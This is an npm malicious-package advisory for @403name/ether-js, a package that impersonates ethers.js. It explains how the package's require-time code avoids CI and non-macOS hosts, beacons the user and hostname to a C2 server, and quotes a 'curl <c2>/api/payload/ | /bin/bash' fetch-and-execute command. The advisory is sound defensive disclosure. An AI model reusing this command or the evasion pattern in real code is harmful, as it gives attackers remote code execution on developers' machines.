npm · Malicious package advisory
Malware@403name/ether-js
MAL-2026-5548
Malicious code in @403name/ether-js (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (927758f43d6eaa6514273bd8ab8f3559624055b9bbf8c9ef9a190b645c0a6eef)
On require('@403name/ether-js'), index.js runs an IIFE that targets macOS only (returns early on non-darwin and when CI/GITHUB_ACTIONS env vars are set), writes a one-shot marker at ~/.cache/.nyx-npm/e, waits a randomized 30-90s, then fetches a C2 base URL from https://raw.githubusercontent.com/nyx-deploy/config/main/c2.txt. It beacons the installer's USER env var and os.hostname() to <c2>/api/clickfix-callback via curl, then spawns '/bin/sh -c' with `curl -sSfL <c2>/api/payload/ | /bin/bash` (detached, disowned) — full remote code execution on the developer's machine under attacker control. A Russian-language comment in the source explicitly states the design avoids lifecycle scripts to be 'invisible to npm audit'. The package name and description impersonate the popular ethers.js library ('Compatible with ethers.js API patterns for easy migration'), and the shipped keccak256 is a stub returning random hex rather than a real hash — confirming the package is a lure, not a functional library. The evasion pattern (platform gate, CI gate, randomized delay, one-shot marker) combined with the two-stage dead-drop-to-C2 fetch-and-exec is conclusive malicious intent.
Compromised versions (2)
- 1.0.1
- 1.0.0
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.